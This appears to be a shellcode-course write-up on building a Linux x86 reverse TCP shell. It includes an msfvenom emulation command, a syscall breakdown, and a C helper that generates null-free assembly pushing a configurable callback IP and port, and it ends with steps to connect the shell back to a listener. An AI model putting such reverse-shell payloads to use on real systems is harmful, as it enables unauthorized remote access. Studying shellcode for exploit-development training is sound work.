- Create a Shell_Reverse_TCP shellcode
- Reverse connect to configured IP and Port
- Execs Shell on successful connection
- IP and port should be easily configurable
The first step is to look at the existing reverse shell payload that ships with Metasploit. With msfvenom and sctest (part of libemu) we can emulate the payload and trace the steps it takes; -G writes a dot graph of the execution that is rendered to PNG:
sudo msfvenom -p linux/x86/shell_reverse_tcp R | sudo ./sctest -vvv -Ss 10000 -G Shell_reverse.tcp.dot && dot Shell_reverse.tcp.dot -Tpng -o Shell_reverse.tcp.png
As we can see, the following syscalls are executed:
socket, dup2, connect and execve
The syscall numbers are listed in /usr/include/i386-linux-gnu/asm/unistd_32.h.
Searching for socket() shows that i386 has no dedicated socket syscall: socket(), connect() and the other socket functions are multiplexed through socketcall (102), which selects the function with its first argument (SYS_SOCKET = 1, SYS_CONNECT = 3, defined in /usr/include/linux/net.h).
#define __NR_socketcall 102
socket  ; #define __NR_socketcall 102, call 1 (SYS_SOCKET)
dup2    ; #define __NR_dup2 63
connect ; #define __NR_socketcall 102, call 3 (SYS_CONNECT)
execve  ; #define __NR_execve 11
The next step is to translate this into assembly.
On IA32 a syscall is invoked with int 0x80, and the registers need to be set as follows:
EAX = System call number
EBX = 1st argument
ECX = 2nd argument
EDX = 3rd argument
ESI = 4th argument
EDI = 5th argument
For socketcall, EBX holds the call number (1 for socket, 3 for connect) and ECX points to an array on the stack holding the actual socket()/connect() arguments, so connect() needs the struct sockaddr_in built on the stack first.
Note that everything except connect() can be borrowed from the bind shell in our first assignment.
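The requirement that IP and port be easily configurable is mostly a byte-order and null-byte problem: the struct sockaddr_in is pushed onto the stack as immediates, so the dotted quad and the port have to be converted into little-endian push operands, and any 0x00 byte in those operands would truncate the shellcode when it is delivered as a C string (127.0.0.1 is the usual offender). The helper below is an added example, not the post's own shellcode or the Metasploit payload: it computes the immediates, flags null bytes, and, where needed, emits an xor-encoded load instead of a plain push. The function names and the default 127.0.0.1:4444 are constructed for the example.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/*
 * Added example (not the post's shellcode): derive the immediates that a
 * shell_reverse_tcp stub pushes to build its struct sockaddr_in, so the IP
 * and port stay configurable without hand-converting byte order, and flag
 * null bytes, which would truncate the shellcode when copied as a C string.
 *
 * struct sockaddr_in in memory: [AF_INET=2][port, big endian][ip, big endian].
 * x86 is little endian, so `push dword imm32` writes the low byte of imm32
 * first: 127.0.0.1 (memory 7f 00 00 01) needs imm32 = 0x0100007f.
 */

/* Immediate for `push dword` that lands as a.b.c.d in memory. 0 on success. */
int ip_to_imm32(const char *dotted, uint32_t *out) {
    unsigned a, b, c, d;
    if (sscanf(dotted, "%u.%u.%u.%u", &a, &b, &c, &d) != 4 ||
        a > 255 || b > 255 || c > 255 || d > 255)
        return -1;
    *out = a | (b << 8) | (c << 16) | (d << 24);
    return 0;
}

/* Immediate for `push word` that lands in network byte order (htons). */
uint16_t port_to_imm16(uint16_t port) {
    return (uint16_t)(((port & 0xff) << 8) | (port >> 8));
}

/* 1 if any of the low n bytes of v is 0x00. */
int has_null(uint32_t v, int n) {
    for (int i = 0; i < n; i++)
        if (((v >> (8 * i)) & 0xff) == 0)
            return 1;
    return 0;
}

/* Key byte k repeated over n bytes such that v ^ key has no null byte.
 * k != 0 and k must differ from every byte of v, so at most n+1 of the
 * 255 candidates fail; the loop always returns before running out. */
uint32_t xor_key(uint32_t v, int n) {
    for (uint32_t k = 1; k <= 0xff; k++) {
        uint32_t key = 0;
        for (int i = 0; i < n; i++)
            key |= k << (8 * i);
        if (!has_null(v ^ key, n))
            return key;
    }
    return 0; /* unreachable, see comment above */
}

/* Emit NASM that leaves a struct sockaddr_in at ESP (pushed in reverse
 * order: ip, port, family). Values containing a null byte are loaded
 * xor-encoded and decoded in a register, so neither the encoded value nor
 * the key contains 0x00. Returns characters written, or -1 on bad input. */
int emit_sockaddr_in(const char *ip, uint16_t port, char *buf, size_t cap) {
    uint32_t ipimm;
    if (ip_to_imm32(ip, &ipimm) != 0)
        return -1;
    uint16_t portimm = port_to_imm16(port);
    size_t n = 0;

    if (has_null(ipimm, 4)) {
        uint32_t k = xor_key(ipimm, 4);
        n += (size_t)snprintf(buf + n, cap - n,
                              "mov eax, 0x%08x\nxor eax, 0x%08x\npush eax\n",
                              (unsigned)(ipimm ^ k), (unsigned)k);
    } else {
        n += (size_t)snprintf(buf + n, cap - n, "push dword 0x%08x\n", (unsigned)ipimm);
    }
    if (has_null(portimm, 2)) {
        uint32_t k = xor_key(portimm, 2);
        n += (size_t)snprintf(buf + n, cap - n,
                              "mov ax, 0x%04x\nxor ax, 0x%04x\npush ax\n",
                              (unsigned)((portimm ^ k) & 0xffff), (unsigned)k);
    } else {
        n += (size_t)snprintf(buf + n, cap - n, "push word 0x%04x\n", (unsigned)portimm);
    }
    /* AF_INET = 2: `push word 0x2` assembles to 66 6a 02 (sign-extended imm8), no null. */
    n += (size_t)snprintf(buf + n, cap - n, "push word 0x2\n");
    return (int)n;
}

int main(int argc, char **argv) {
    const char *ip = argc > 1 ? argv[1] : "127.0.0.1"; /* constructed defaults */
    uint16_t port = argc > 2 ? (uint16_t)atoi(argv[2]) : 4444;
    char asm_text[256];
    if (emit_sockaddr_in(ip, port, asm_text, sizeof asm_text) < 0) {
        fprintf(stderr, "bad ip: %s\n", ip);
        return 1;
    }
    fputs(asm_text, stdout);
    return 0;
}
```

Run it as `./sockaddr 192.168.1.10 4444` and it prints a plain `push dword 0x0a01a8c0` / `push word 0x5c11` pair; for `127.0.0.1` the IP becomes `mov eax, 0x0302027d` / `xor eax, 0x02020202` / `push eax` instead. After the three pushes ESP points at the struct, which is the address that goes into the socketcall argument array for connect(). The same check applies to any other immediate in the stub; a `push word 0x2` for AF_INET is safe only because the assembler picks the imm8 form.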
Put this shellcode into the shellcode test harness, then compile and run it: ./compile.sh bindshell
Start a listener on the configured port, run the shellcode, and the shell connects back:

